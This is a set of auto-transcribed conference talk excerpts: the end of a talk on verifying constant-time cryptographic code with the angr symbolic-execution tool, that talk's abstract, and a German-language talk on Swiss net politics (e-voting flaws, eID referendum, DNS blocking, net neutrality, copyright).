after angers run through the the code you can just ask it do any of the following classes of bugs can they possibly happen and then there's some automated tools called smt solvers which can sometimes answer this question they might run a very very long time for but for this example it runs in under a minute and tells you yes the code always works all right last slide here what is missing what are the people who are trying this approach working on well you can always do if you have constant time code you can always do this anger translation another tool which will do this for you which I haven't used personally but manticore supposedly can do the same thing from binaries and comes with a lot of the same kinds of analyses that I've worked with anger works just fine also it has this cool gooey called anger management so anger yeah it'll it'll always convert your code into this dag and then the right the red arrow there it'll always give you the results of that and then all of the the interesting problem at that point is if the smt solvers aren't smart enough to see that the resulting code works then you have to build some new tools which will look at for instance you get one dag for your reference code which you're you've reviewed and you're sure it works you have another dag for your complicated fancy vectorized assembly implementation and then you want to see are those doing the same computation and you have to kind of match up those decks and people will give these arguments that yeah this is why this is the same and the whole game here is to build tools which are doing this this is maybe I'll skip the sorting example aside from giving the url just an example of doing this is for sorting code where right now the fastest intel chip sorting code for integer arrays in memory is some new sorting code which is constant time it's like three times faster than Intel's integrated performance primitives library where they were trying to optimize sorting and it is verified to produce the right results with some tools which look at the dag's coming out of anger and say yes that is a correct sorting program if you're interested in doing this sort of thing then you should say all right here's some crypto code where nobody's claimed that it's verified which is most crypto code you can just take random examples and then say all right let's make it constant time first if it's not then forget it it's going to be vulnerable to timing attacks throw it away but if it is constant time then use anger and get this dag out of it and then say well okay why does that match some other code which is supposed to be doing the same computation like assembly versus some reference c code for example and then figure out how you can match up those dag's and usually a little bit of python scripting will do that matching for you it'll tell you if there's any problems sometimes you have to get into the details of how the crypto computations are done but it's actually fun that's the great thing about this approach compared to all the the proving tools doing symbolic testing symbolic execution with anger followed by matching up the dag's analyzing the dag's it's fun it's actually a fun way to analyze crypto software at this point we'll be happy to take questions so thank you for your attention thank you all right we will do a very high speed q&a session so please limit yourselves to questions not comments microphone number one please okay i think it's a very short question is constant time really the only mitigation against timing attacks well it's a mandatory thing i mean you can do more you can do randomization such things but you want to have that those don't depend on the secret data in a reproducible way all right mic number two please thanks for the talk can any approaches from real-time operating systems can be applied to cryptography so so real time is usually trying to say you want to make sure the operation finishes at most this amount of time but the thing that happens in fancier timing attacks like hyperthreading attacks is that before you've even reached near the end of the computation the attackers already extracted the secret data and so it's it's a different game that real-time operating systems are playing if you have constant timecode that can be useful in the real-time context but it's a stronger constraint thanks all right back to one please thanks for this amazing talk um i just had a question regarding evercrypt you said that the curve 25519 implementation was slower than the other stuff that's available from my knowledge the curve 25519 curve 25519 implementation evercrypt is actually one of the fastest ones on intel yes on arm it's slower on intel it's it's at the state of the art but on arm it's a few times slower okay thanks all right internet go um did the formal verification of evercrypt also check for the lack of side channel attacks or just for the functional correctness it checked for functional correctness and a lack of timing attacks it's actually a constructive way of of producing code which is constant time all right mic number seven you mentioned you mentioned compiler bugs uh how probably would it be that in bug and anger covers up a bug in your code it's it's possible definitely the whole situation for testing is that you've got your original code maybe you made a mistake there you've got your test framework maybe you made a mistake there and you're trying to have these be sort of independent tests and then ultimately of course if everything's proven then uh yeah you can imagine proving that anger works correctly do that once and then it works for everything but since it includes some kind of complicated stuff and all of python and smt solvers and so on um it's going to be some time before we're at that point so yes there's definitely a possibility of bugs in anger it's something to worry about as long as they're kind of independent of the bugs that you'll make in your crypto code then you're reducing the risk of errors all right mic the signal angel please um is there uh progress in the formal proof of true randomness that's enough of an answer i think mic number one please uh what's the status of um doing pairing friendly over the arithmetic and pairing friendly curves uh in constant time so this is again a little more complicated so if you just want the scalar multiplication uh the tpm fail paper was also attacking the bn curves so just the same issue appeared there as well so implementation were not constant time even though they were inside the tpm code which should have been validated the pairing on top of it is is looking a little bit like um exponentiation computation so the same tricks will work at this moment the best reddit code apparently was not constant time all right microphone number one last question what about super scalar processors um do they mess up your carefully crafted constant time algorithms or is that um at least from a certain distance not relevant anymore they are short the the way to think about it is that you you want to have that there's like some isolated data which is holding all your secrets and then there's never anything which is copied out of that sort of safe environment into the metadata which is controlling timing now if you have a super scalar processor you've got multiple instructions happening in a cycle but as long as the decision of which instructions are being executed is not based on the data that you're working with then you're good and that's where you have to be sure that the the processor is handling thing is you know each instruction the time that it takes is only based on the other metadata outside the secure environment okay thank you for this great talk and please thank our speakers again you
oftware bugs and timing leaks have destroyed the security of every Chromebook ECDSA "built-in security key" before June 2019, ECDSA keys from several popular crypto libraries, the Dilithium post-quantum software, the Falcon post-quantum software, and more. Will we ever have trustworthy implementations of the cryptographic tools at the heart of our security systems? Standard testing and fuzzing catch many bugs, but they don't catch all bugs. Masochists try to formally prove that crypto software does its job. Sadists try to convince you to do your own proof work and to let them watch. After years of pain, a team of fifteen authors has now proudly announced a verified crypto library: fast but unportable implementations of a few cryptographic functions specifically for CPUs that aren't in your smartphone. This is progress, but the progress needs to accelerate. This talk will highlight a way to exploit the power of modern reverse-engineering tools to much more easily verify crypto software. This relies on the software being constant-time software, but we want constant-time software anyway so that we can guarantee security against timing attacks. Constant-time software is also surprisingly fast when cryptosystems are selected carefully. This talk is meant as an introduction for a general audience, giving self-contained answers to the following questions: What are timing attacks? What is constant-time software? What are some examples of constant-time crypto? How can we be sure that code is constant-time? What do these reverse-engineering tools do? How does constant-time code help these tools? How do we get from reverse engineering to guaranteeing correctness? The talk will be given as a joint presentation by Daniel J. Bernstein and Tanja Lange.
10.5446/53138 (DOI)
Wir bekommen jetzt ein Lagebericht von Kira, von Gandhi und von Paki aus der Schweiz, aus der Schweizer Netzpolitik Szene. Die beschäftigen sich mehr oder weniger mit den gleichen Themen, die wir in der deutschen Netzpolitik auch schon durchgekaut haben und immer und immer wieder auf Endlos schleifer haben. Und nun werden wir von den Dreien hören, wie sich das im Nachbarland entwickelt und wieder die neuesten Erkenntnisse sind. Heißt ihr willkommen mit mir zusammen. Ja, vielen Dank für die Einführung. Es freut uns sehr, dass wir auch am 36. Haus Kommunikationkongress euch auf eine Reise durch die Netzpolitik zwischen Bodensee und Matterhorn mitnehmen dürfen. Eure Reiseleiter in der nächsten Stunde sind Simon Gantenbein, Paki Stäli und mein Name ist Erik Schönenberger. Wir sind von der digitalen Gesellschaft. Wir sind eine gemeinnützige Organisation in der Schweiz. Wir kümmern uns um die Themen, die sich aus der Digitalisierung und Vernetzung für die Gesellschaft ergeben. Wir tun dies aus einer vielgesellschaftlichen Perspektive und wir sind vor allem auch ein Bündnis, ein Zusammenschluss von verschiedensten Organisationen in der Schweiz, die sich um netzpolitische Themen kümmern. Wir legen gleich los auf unserer Reise und ich übergebe an Paki. Ja, vielen Dank. Und wir beginnen unsere Reise quer durch die Schweiz von Bodensee bis zum Matterhorn in der achtgrößten Stadt, nicht unseres Landes, aber dem von Kanada in Vancouver. Eingeweihte sollten wir eigentlich wissen, welches Thema das jetzt geht. Es geht um E-Voting, wie man es offiziell nennt, oder wir sagen Cyber-Voting. Letztes Jahr musst du mir leider berichten, dass eins von zwei zugelassenen E-Voting-Systemen jetzt nicht mehr zugelassen ist, nicht mehr weitergeführt wird. Anscheinend gibt es Kostengründe, weil Sicherheit anscheinend kostet. Wie hätte das gedacht? Es gibt aber auch neue Anforderungen wie die universelle Verifizierbarkeit, die jetzt neu für E-Voting-Systeme gilt der neuen Generation. Und ein Hersteller eines Sogelsystemen nennt sich Skittle, ist eine Softwarefirma in Spanien und die Schweizer Post betreibt dieses System von Skittle. Nun, Skittle macht eigentlich alles, was das Heckerherz begehrt, von Online-Abstängungen bis zu diesen Wahlcomputer. Und das gelingt nicht immer. Recherchende Republic, eine Online-Zeitung in der Schweiz haben ergeben, dass sie den Auftrag hatten, Wahlen in die Ecuador durchzuführen, im Dschungel. Und im Dschungel hat man halt nicht so viel Internet. Diese Wahlurnen waren dann etwas bessere Briefbeschwerer. Das heißt, die Scans mussten dann in Spanien ausgezählt werden. Das ging dann relativ schnell, weil sie haben noch ein paar Manager von Skittle dann in Ecuador behalten, als Gäste versteht sich. Nun, der Druck war groß auf die Post und Skittle, dass das in der Schweiz funktioniert. Also haben wir gesagt, wir versuchen jetzt irgendwie zu beweisen, dass das System sicher ist. Dann sind wir eine gute Idee. Wir machen ausser so einen Public Intrusion Test. Ja, der Quellcode muss aufgelegt werden. Das steht eigentlich auch so in der Verordnung drin. Es wurden ganze 150.000 Schweizer Franken investiert in Bockbandis. Das ist natürlich ein extrem kleiner Betrag. Ich nehme an, das ist das ganze System kostet dann 1020 Faches, was auch immer. Und es wurde also dieser Source Code dann aufgelegt. Es war eigentlich wie ein Dump. Es waren irgendwie drei Klammits drin. Und man bekam diesen Code nur gegen ein NDA. Und die in diesem NDA ist dann drin. Schwarzstellen dürfen nicht veröffentlicht werden. Das ist ja responsible disclosure. Das heißt, wenn sich die Posts alle 45 Tage meldet, dann bleiben diese Schwachstellen unentdeckt. Nun gibt es keinen Sicherheitsinstitut, keinen namhaften Forscher, wird es sich für so eine kleine Summe da von den Karten spannen lassen und Personen testen überhaupt nicht machen. Und Informationen haben halt nicht den Drang zur Freiheit. Und das gibt es, sehr schnell wurden da Klonsignen verteilt oder gelegt, wie unser Schirm sagt. Nun, die Post liest jetzt neu das Twitter auch und hat gesagt, ja, wenn sie schon berücksichtigt ist, dann kann man sich nicht mehr lieken. Das war zum Zeitpunkt, dass dieser Tweet geschrieben wurde. Natürlich klar, weil da war es ja wirklich public. Aber vorher kam man ja nur über das NDA zu diesem Code. Und es verletzte übrigens Copyright, wenn ihr unseren Code da weiter verteilt. Das sah dann auch gut ab so. Sie mussten dann die Repositories, die Klone dann irgendwie runternehmen, aber nicht schnell genug. Denn durch das Liege wurde erst möglich, dass sich namhafte Sicherheitsforschende auf dieses Thema gestürzt haben, zum Beispiel die Open Privacy Research Society, jetzt eben halt aus Vancouver. Und stellvertretend dafür Sarah Thamme-Lewis, die Direktorin, die sich da in diesen Code reingewühlt hatte. Und sie fand heraus, dass die Implimentation der Grundkonzepte, die das E-Votings, die Zero Knowledge Proofs, die hatten alle Fehler drin. Jeder einzelne, every single one. Damit war also das Rückgrat der ganzen Lüse umgebrochen. Denn die Zero Knowledge Proofs, die versichern, dass jemand nur einmal abstimmen kann, dass seine Stimme dann richtig gezählt wurde, dass das Gesamtagin ist, richtig zusammen gezählt wurde. Und ihr verzieht war dann schlussendlich Burning with Fire. Das war auch mein Eindruck, als ich mir das System angeschaut habe, als Kryptoleihe. Ich verstehe die ganze Kryptosache nicht, aber ich verstehe, wenn man Kryptoschlüsse lädt, die nicht laden kann und dann irgendwie einen komischen Fallback macht und dann nur irgendjemand was ins Loch reinschreibt, dass niemand liest, so kann das System nicht zuverlässlich funktionieren. Und ich dachte dann, als ich diesen Typ gelesen habe an dieses Bild, so muss sich wahrscheinlich Sarah dann gefühlt haben. Und nun die Post, die liest jetzt wirklich dieses Twitter, weil ein paar Tage später stellt sich heraus, ah, war nicht so schlimm, Fehler behoben, schwammt rüber. Das Problem ist halt, und das softer entwickelt weiß ich, dass man schreibt eine Zeile Code und was zu fixen, dann haben wir zwei neue Wachs, zumindest bei mir so. Und das Kernproblem war jetzt eigentlich, dass dieses ganze System so live gegangen wäre, hätte mir nicht massiven Druck auf die Bundeskanzlei, auf die Post, auf das Kittel und auf alle anderen Akteure, auf die Parlamentarier, mit denen wir wirklich geredet haben. Das System wäre so live gegangen, ohne dass die von diesen Schwachstellen wussten oder das Leute von diesen Schwachstellen wussten, aber sie für sich selbst dann werden spruchten. Und an dieses Bild habe ich dann auch noch gedacht, als der Nationalrat, das heißt die kleine Kammer unseres nationalen Parlaments, die große Kammer, Entschuldigung, beschlossen hat das E-Voting abzubrechen. Nun, das ist jetzt noch kein Grund zum Jubel, denn die kleine Kammer, der Ständerat, der wird diese Emotion dann sicher ablehnen. Und darum ist es auch extrem wichtig, dass ihr die Initiative für das E-Voting-Moratorium, bei der wir eigentlich wollen, dass das E-Voting für die nächsten ein Jahre auf Eis gelegt wird und dann der Stand der Technik nochmals angeschaut wird und zu schauen, gibt es jetzt etwas, wo man ein sicheres E-Votingsystem machen kann, damit das nochmals neu evaluiert werden kann. Und weiter geht es jetzt mit Simon auf unserer Reise in Bern. Genau, ich nehme euch mit nach Bern. Wir sprechen kurz über die EID und als Ort in Bern haben wir diese Türe. Politisch engagierte von euch werden diese Türe kennen. Diese Türe gehört zum Bundeshaus, zum Parlamentsgebäude. Das ist der Ort, wo man bei Initiativen und Referenten die Unterschriften übergibt. Nun, bei der EID, das war ein Kampf, ist immer noch ein Kampf, die Problematik liegt, dabei, dass der Bund möchte gerne eine elektronische Identität anbieten, aber es ist umstritten, wie diese Identität gestaltet werden soll und auch wie der Funktionsumfang aussehen soll. Beim Bund gibt es die Ansicht, es sei ein Login, man könne damit e-Commerce betreiben, das ist so ein Anwendungsbeispiel. Klar, bei der EID geht es nicht um das. Die EID ist kein Login, sondern es geht darum, dass man gewisse Geschäfte mit einem Rausweißpflicht tätigen kann, z.B. rechtsgültige Verträge abschließen oder auch bei Unterschriften-Sammlungen, die könnte man ja auch digital durchführen, dann würde man viel Papier, viel Bäume retten. Unsere Position ist, wir wollen, dass die EID genutzt wird zur politischen Teilhabe und nicht als Login für irgendwelche kommerziellen Produkte. Die Geschichte um die EID ist schon ein paar Jahre alt, der Bund hat verschiedene Konzepte erarbeitet, es wurden Konzeptstudien gemacht, zwei Schlagworte sind in diesen Dokumenten immer wieder vorgekommen, eine elektronische Identität muss sicher und vertrauenswürdig sein. Ein Konzept, das angeschaut worden ist, ähnlich wie in Deutschland beim neuen Personalausweis, das wurde dann allerdings verworfen und man ist zum Schluss gekommen die beste Lösung für eine elektronische Identität, sei es, dass man das privaten Anbietern überlässt. Man spricht hier von sogenannten Identity-Providern. Der Bund hatte vor ein paar Jahren, gab es schon mal ein EID-Projekt, die SwissID, nicht wie hier geschrieben, sondern Swiss auf Französisch, dieses Projekt ist gescheitert. Die Neuauflage ist von einem Konsortium, der Swiss Seingrub, zu der gehören untereinander die Post, die SBB, die Swisscom, Banken und Versicherungen und die sollen jetzt also für uns diese staatshoheitliche Aufgabe übernehmen, dass wir uns elektronisch im digitalen Raum ausweisen können. Während der Prozess im Parlament gelaufen ist, haben die digitale Gesellschaft, Public Beta und V-Collect eine repräsentative Umfrage erstellen lassen mit der Fragestellung, wer soll dann überhaupt eine solche elektronische Identität anbieten? Und ihr seht, der blaue Balken ist relativ groß und wenn wir auflösen, sehen wir, 87% der Befragten wollen eine EID vom Staat, nur 2% von privaten Unternehmen. Allerdings, eine weitere Frage dieser Umfrage war auch noch, ist die EID ein Bedürfnis und hier sagten 43% der Befragten, ja, wir möchten in den nächsten 3 Jahren gerne eine elektronische Identität. Diese Umfrage, auch wenn sie von uns in Auftrag ebben worden ist, ist sehr spannend, weil wir hatten vorhin das Thema sicher und vertrauenswürdig und das wird dick, der Bürger ist klar, das Vertrauen liegt bei einer elektronischen Identität beim Staat und nicht bei Konzernen und Großfirmen. Immer dann, wenn Not am Mann ist, dann versuchen wir politisch Einfluss zu nehmen und wenn die Not besonders groß ist, dann leit sich ein Nord, einen Anzug, weil er besitzt ja keinen und hängt den Hoodie an den Haken und wir haben dann in der entsprechenden, vorberatenden Kommission im Parlament versucht, unsere Stimme gelten zu machen. Als kleine Klammerbemerkung, eine Kommission in der Schweiz ist ein Parlamentsausschuss in Deutschland, also Geschäfte werden, bevor sie im Plenum beraten werden, zuerst in einer kleineren Gruppe vorbesprochen, den Plenum werden Vorschläge erarbeitet, also das Äquivalent in Deutschland wäre der Ausschuss. Wir hatten auch einige Unterstützer, das sind Parlamentarier, die haben unser Anliegen nach einer staatlichen und nicht privat näher, die unterstützt, die Unterstützung war allerdings so knapp, die Parlamentsmehrheit hat gesagt, uns ist das egal, wir wollen eine private Lösung mit diesem Swiss Concertium und so ist es gekommen, wie es kommen muss, wenn man in der Schweiz mit einer politischen Vorlage nicht zufrieden ist, man ergreift das Referendum und das haben wir dann auch gemacht. Die einen oder anderen von euch kennen die Plattform Wie-Collect, mit Wie-Collect ist elektronisch Stimmen zu sammeln, respektive man kann das Unterschriftenformular zu großen Teilen ausdrucken und es ist schon an die richtige Adresse, die richtige Adresse ist schon eingefüllt und wir hatten einen Start-Boost durch das, eine große Mobilisierung und Informationskampagne am Anfang, die hat gezogen, wir hatten in den wenigen Tagen sehr viele Unterschriften, doch dann, wie immer, mussten den klassischen Weg auch noch beschreiten und so sind wir auf die Straße bei Schnee und Regen gegangen und haben bei den einzelnen Bürgern darum gebeten, doch unser Anliegen zu unterstützen. Bei Referenten ist es so, dass man innert 100 Tagen 50.000 Unterschriften sammeln muss, das ist wirklich harte Knochenarbeit und an dieser Stelle auch herzlichen Dank für alle jene, die eine Unterschrift beigetragen haben oder den Unterschriftenbogen in ihren bekannten Kreis herungereicht haben. Wenn die Unterschriften dann zurück im Backoffice sind, dann müssen diese Unterschriften sortiert werden, die werden dann die Gemeinden geschickt, die Gemeinden einigen dann, dass diese Person in dieser Gemeinde vortapitzt und danach werden die zurückgeschickt und gezählt. Sehr viel administrativer Aufwand. Hier wäre eine staatliche EID durchaus eine praktikable Lösung, aber leider sind wir noch nicht so weit. Ich kann euch gutes berichten. Die Referendumsfrist läuft am 16. Januar raus und die Färbedast, sie ist abgehoben. Wir werden nicht nur 50.000 Unterschriften zusammen haben, sondern wir erwarten 70.000 Unterschriften. Wir haben in den letzten, ein, zwei Mal bei politischen Referenten mitgewirkt, auch bei den Überwachungsgesetzen. Dort ging es um Grundsätzliches. Wir wussten von Anfang an vor dem Volk zu gewinnen, wird schwer sein. Hier ist es klar, ihr habt vorhin die Umfrage gesehen. Die Mehrheit will eine staatliche EID und wir sind sehr zuversichtlich, dass wir den Abstimmungskampf gewinnen werden und so das Parlament abfordern, eine neue Ablage dieses Gesetzes zu machen mit den entsprechenden Änderungen. Jeder, der kommen will, am 16. Januar um 13.45 Uhr in Bern auf der Bundesterrasse werden die Unterschriften in einer feierlichen Zeremonie übergeben und voraussichtlich im kommenden Mai oder September wird dann das Schweizer Volk darüber abstimmen und nun nimmt euch Paki mit an einen ganz speziellen Ort. Ja, wir befinden uns irgendwo in diesem Cyberspace rund um die Schweiz. Es geht um Netzsperren. Seit dem ersten Januar haben wir ein Gesetz, das Geldspielgesetz, welches Grückspiel und so weiter regelt und Lotterie und so weiter. Und für Politiker sind hier Netzsperren. Für Politiker, die uns zuschauen hier, Netzsperren sind in etwa das hier. Ja, ich muss es jedes Jahr sagen, wir haben jedes Mal so ein Symbolbild und ja, wir wissen, dass ihr uns ein Tor schaut. Aber ja, diese Netzsperren sind jetzt also drin. Auf den 1. Juli sollten die Staaten, irgendwann mal im Juni war dann die technische Spezifikation veröffentlicht. Es gab nur noch so ein paar Probleme, wenn man hier genauer hinsieht. Aber technisch, man muss ja, dass es kommt und technisch ist relativ einfach, wenn meine schöne Wettseite doch kommen auf dieser Liste drauf ist, dann wird sie gesperrt, dann bekommt man so eine schöne Stoppseite. Das Lungszunier bei DNS-Sperren, also werden da DNS-Antworten gefälscht mit allen technischen Umzulänglichkeiten, die da dazukommen. Und ja, von diesen Speerleisten gibt es praktischerweise 2 davon. Die eine ist von der Eichenessischen Spielbank-Kommission. Man sieht hier auf der linken Seite, rechten Seite, die Domainnahmen, und da die eben dann wann dieser Verfügung erlasten wurde, das wird publiziert im Bundesblatt. Und dann haben die Provider dann ein paar Tage Zeit, um diese neuen Einträge dann einzusetzen. Ihr seht auch, die Liste ist praktischerweise alphabetisch sortiert und nicht nach Datum, macht das natürlich auch einfacher. Die andere ist von Comlot, der Lotterie- und Webbewachskommission, ist auch hier, wieder so ein PDF. Mittlerweile kommen auch Updates rein, wie ihr seht, satt da neue Daten auch drunter. Nun, ich habe mir dieseseits mal angeschaut, als die Liste zum ersten Mal publiziert wurden, in zwei, drei Tage später, habe ich mich dadurch den Sumpf durchklickt. Und die Listen umfassen, die Liste der Erstbäcker hatte, der Spielbank-Kommission, die hatte 39 Einträge von 32 verschiedenen Anbieter. Es gibt auch Anbieter, die sind schlau, die machen irgendwie meine schöne Webseite, Dotcom 1 bis 17 und die sind dann halt doppelt drin, aber das geht einem zum gleichen Anbieter. Die Liste von Comlot war ein bisschen umwassener, das waren 65 Einträge mit 29 verschiedenen Anbieter. Unser Zeitpunkt, das ich die getestet habe, blockierten 20% der Domains, mich als Schweizer Benutzer, wenn ich dort zugreifen wollte. Das heißt, ich bekam entweder eine Speersite vom Anbieter selbst, du darfst diese Webseite nicht benutzen, oder ich konnte mir keinen Account klicken, weil das Land Schweiz fehlt in der Aufzählung. Das heißt, wir haben einen Overblocking von 20%, und wenn wir uns mal sowas anschauen, wie so eine Speersite aussieht, Moment, den ist es aber wechseln. So, ich habe ja keine Chance, als Leier mit dieses Angebot zu benutzen. Und im Gesetz drin steht, dass dies eigentlich nicht gesperrt werden dürfte, weil der Anbieter bietet es ja in der Schweiz nicht an. Aber es geht noch schlimmer. Dieser Sanitär und Spezialist für Photovoltaikanlagen, der wurde gesperrt. Wahrscheinlich war es eine Fehlkonfiguration, aber wenn man aus der Schweiz auf solobed1.com ging, kann diese Seite. Es war eine Fehlkonfiguration, aber dennoch zeigt, dass die Problematik, dass da massiv zu viel geblockt wird. Und die Schwerden umgehen, ich frage euch jetzt sicher, wie ich überhaupt dieses GreenJots machen könnte, dann geht mal bei eurer Suchmaschine irgendwie Digiges und DNS ein, dann findet ihr unser neues Angebot. Wir bieten jetzt neu seit langer Zeit, unsensiert und ohne Logging DNS aber an, erreicht war nur verschlüsselt, weil das unverschlüsselte DNS so liegt wie an seinen Todsterben. Wir veröffentlichen auch einen Transparenzbericht. Und nun reisen wir weiter, wir kieren, wir nehmen diesmal die S-Bahn in den Kanton Golarus. Danke. Das nächste Thema ist Netzneutralität. Netzneutralität bedeutet, dass alle Daten Pakete im Internet gleichberechtigt übertragen werden. Dies ist ein ganz zentrales Element und eigentlich die Grundlage des Erfolgs des Internets überhaupt. Es ist dieses Innovation without permission Prinzip, nachdem ich niemanden um Erlaubnis fragen muss, ob ich einen Dienst oder eine Dienstleistung im Internet anbieten möchte. Dies ist ein reales Beispiel aus Portugal Hier wird durch sogenanntes Zero Rating gewisse Angebote im Internetabonnement, respektive im Handyabonnement inkludiert. Für andere muss zusätzlich bezahlt werden. Wir möchten nicht, dass es auch in der Schweiz möglich wird, dass durch entsprechende Angebote die Übertragung für nicht gelistete, also nicht inkludierte Angebote oder Dienste plötzlich ruckelt. Das Thema Netzneutralität beschäftigt uns seit vielen Jahren. Konkret hat es 2013 begonnen, als wir eingeladen waren in eine Arbeitsgruppe des Backkomm, des Bundesamtes für Kommunikation, uns darüber auszutauschen, ob und wie Netzneutralität in der Schweiz reguliert, also in einem Gesetz festgehalten werden könnte. Es waren viele Sitzungen, sehr Verhandlungen über ein ganzes Jahr und wir waren eigentlich immer einen Schritt hinter den Anwälten der Konzerne, hinterher die mehr oder weniger die Themen, oder die Unterthemen gesetzt haben. Entsprechend war das Resultat enttäuschend. Es war ein eher harmloser Bericht, der veröffentlicht wurde. Es war mehr oder weniger eine Gegenüberstellung der Argumente der beteiligten Firmen und Organisationen. Es folgte dann ein Bericht, eine Vernehmlassung 2016 und ein Gesetzesentwurf zu handeln des Parlaments 2017. Und basierend auf diesem Bericht des Backkomms waren dann in diesem Gesetzesentwürfen eigentlich immer nur von Transparenzrede. Es wurde nur eine Transparenz im Sinne für die Netzneutralität vorgesehen. Und das hätte bedeutet, also wäre eine Abkehrung vom Best Effort Prinzip gewesen, man hätte eigentlich eine transparente Diskriminierung geschaffen und wir hätten eine deutlich schlechtere Situation gehabt als heute, als ohne Gesetz. Wir waren dann im November 2017 basierend auf unserer Vernehmlassungsantwort eingeladen, unsere Position in der vorbereiteten Kommission des Parlaments zu erläutern. Und wir haben diese Gelegenheit bewusst genutzt, um einen eigenen Gesetzesentwurf vorzustellen, wie man in unserem Sinne Netzneutralität festschreiben müsste. Und es ist dann auch tatsächlich Bewegung in die Angelegenheit gekommen. Die Kommission hat dann basierend auf unserem Vorschlag einen neuen Gesetzesentwurf gemacht und diesen auch beschlossen, er wurde auch vom Nationalrat angenommen, der großen Parlamentskammer in der Schweiz. Und er kam dann in die kleine Kammer, in den Ständerat und da wurden Ausnahmen für sogenannte Spezialdienste in die Netzneutralität noch eingeführt. Das war eine ähnliche Diskussion, wie sie auch in der EU geführt worden ist, als es da um die Netzneutralität ging. Und die große Gefahr bestand mit dieser Ausnahme für Spezialdienste, dass der Zweck des Gesetzes wieder ausgehebelt worden wäre. In dieser Phase haben wir sehr schlagter Gespräch gesucht, haben uns eingebracht, haben Informationen erarbeitet und diese auch den Parlamentarien und Parlamentarier zur Verfügung gestellt. Und das Beispiel der Netzneutralität oder dieses Gesetzes zeigt, dass man mit einer gewissen Hartnäckigkeit auch etwas erreichen kann. Und hier schließt sich auch der Kreis zum Kanton Glarus, ich mach mich erinnern, als in dieser Phase mich spät nachmittags an einem Freitag ein Ständerat aus dem Kanton angerufen hat und er hat das Gespräch begonnen mit Galatzi. Sie sind mit unserer Arbeit nütztfriede. Das Gesetz ist dann im Anschluss beschlossen worden, also das ist Teil des Fernwändegesetzes, das ist diese Regulierung zur Netzneutralität. Es gelten Ausnahmen für Spezialdienste, die sind jetzt aber so gefasst, dass diese nur eigene Dienste des Providers umfassen, also das sind Dienste wie Fernsehen oder Internettelefonien. Das ganze, das Gesetz ist ein großer Erfolg für die netzpolitische Community in der Schweiz und es wird ziemlich sicher in der zweiten Hälfte im nächsten Jahr in Kraft treten. Für die nächste Station reißen wir weiter nach Zürich. Genau, und zwar werden wir uns das Urheberrecht vornehmen. In der Schweiz wurde in diesem Jahr eine Urheberrechtsrevolution angegangen und bevor wir jetzt in die technischen Details stürzen, eine kleine Vorbemerkung. Man kann in der Schweiz, wenn ein Gesetz im Parlament, bevor es im Parlament ist, kann man sich dazu äußern, das sind die sogenannten Vernehmlassungsantworten, da werden Verbände angeschrieben, aber auch jeder von euch kann sagen, mir gefällt das Gesetz oder der Vorschlag aus folgendem Grund nicht. Und beim neuen Urheberrechtsgesetz sind 1.200 solche Vernehmlassungsantworten bei der entsprechenden Abteilung angekommen. Das ist schon fast ein DDoS. Eine der Knacknüsse im neuen, neu geplanten Urheberrechtsgesetz war das Leistungsschutzrecht. Das hat der Verband der Schweizer Medien durchgedrückt. Technisch gesehen geht es um eine Vergütungspflicht für journalistische Inhalte. Man kann auch Linksteuer sagen. Wenn man auf eine journalistische Seite verlinkt, soll man jetzt eine Abgabe zahlen, ähnlich wie man das auch zum Beispiel bei Tonträgen kennt. Dass das Leistungsschutzrecht keine gute Idee ist, sieht man im europäischen Vergleich. Ich habe drei Beispiele. Einerseits das Beispiel aus Frankreich. Dort wurde ein Leistungsschutzrecht eingeführt und Google sagt, wir möchten da nicht zahlen, sondern wir blenden die Inhalte bei Google News aus. Das zweite Beispiel in Deutschland wurde auch ein Leistungsschutzrecht eingeführt. Und als das Gesetz in Kraft war, die erste Handlung war, Google bekommt eine Ausnahme. Man hat ein Gesetz geschaffen und dem Gesetz gleichzeitig die Zähne gezogen. Das dritte Beispiel ist Spanien. Da gab es ein Leistungsschutzrecht ohne Ausnahmen und die Konsequenz war, dass der Traffic auf die Newsseiten um 10-15% eingebrochen ist. In der Schweiz hat sich während des Urneu-Urheberrechts-Gesetz im Prozess war, eine Allianz gebildet für ein faire Urheberrecht. Hier seht ihr das eine oder andere Logo, das euch vielleicht bekannt vorkommen könnte. Wir befinden uns jetzt zeitlich im letzten März und da war auch noch etwas anderes, europaweit. Vielleicht könnt ihr euch noch an die Artikel 13-Diskussionen um den Upload-Filter erinnern. Die beiden Urheberrechte haben nichts miteinander gemein, aber dort wurden in der kurze Zeit 5 Millionen Unterschriften gegen den Upload-Filter gesammelt. Wir in der Schweiz haben mit dem Urheberrecht zu kämpfen, gleichzeitig aber auch auf europäische Ebene kam der Bewegung ins Spiel. Diese Bewegung hat sich dann in einem europaweiten Streiktag manifestiert und wir haben die Gelegenheit genutzt und in der Schweiz auch eine Demonstration gemacht gegen unser neues Urheberrechtsgesetz. Darum sind wir jetzt in Zürich. Es haben sich über 1.000 Personen an diese Demonstration eingefunden, um das neue Urheberrechtsgesetz zu protestieren. Weniger Tage später wurden wir dann in die entsprechende Kommission im Ständerat eingeladen und wir haben darum gebeten, das Leistungsschutzrecht bitte zu streichen, weil es schlichtweg keinen Sinn macht. Und was ich euch nun zeigen werde, ist ein Video aus dem Ständeratzahl. Hier seht ihr Ruadinoser und er war der Kommissionspräsident, also der Vorsitzende dieser Kommission und er erklärt den Plenum, dass man das Leistungsschutzrecht aus dem neuen Urheberrecht entfernt. Zum Leistungsschutzrecht haben wir Anhörungen durchgeführt. Der Berufsverband der Journalisten und die Verleger auf der einen Seite, die Vertreter der digitalen Gesellschaft und die Firma Google auf der anderen Seite. Man kann natürlich immer geteilt daran sein, ob man eine einzelne Firma zu einer Anhörung einladen soll oder nicht. Da ist aber beim Leistungsschutzrecht in erster Linie, um eine Lex Google zu gehen, haben wir uns in der Kommission ausführlich dazu ausgesprochen, um entschieden, sie in die Anhörung einzuladen. Ich darf Ihnen berichten, dass das Setting des Hearings, also die Vorstellung der Zusatzberichte Verwaltung, die beiden Experten mit ihrem Wissen und die Diskussion mit den Vertretern der beiden Seiten sehr aufschlussreich war. An dieser Stelle möchte ich klar sagen, dass der Rückweisungsantrag eindeutig zur Verbesserung der Qualität des Gesetzestextes beigetragen hat. Das ist natürlich als Präsident nicht einfach immer so etwas zu sagen, Herr Kollege Bischoff. Das neue Urheberrechtsgesetz wurde dann verabschiedet, das Leistungsschutzrecht wurde rausgenommen. Es hätte noch weitere Punkte gegeben, die uns beim neuen Urheberrecht nicht gefallen, aber wenigstens konnten wir einen kleinen Teil davon entfernen. Somit kann man sagen, ein Teil erfolge zielt. Very nice. Entschuldigung. Und nun gehen wir zu Kire in den tiefen Kanton Argau. Ja, wir springen nach Oberwiel-Lihrli. Das ist diese 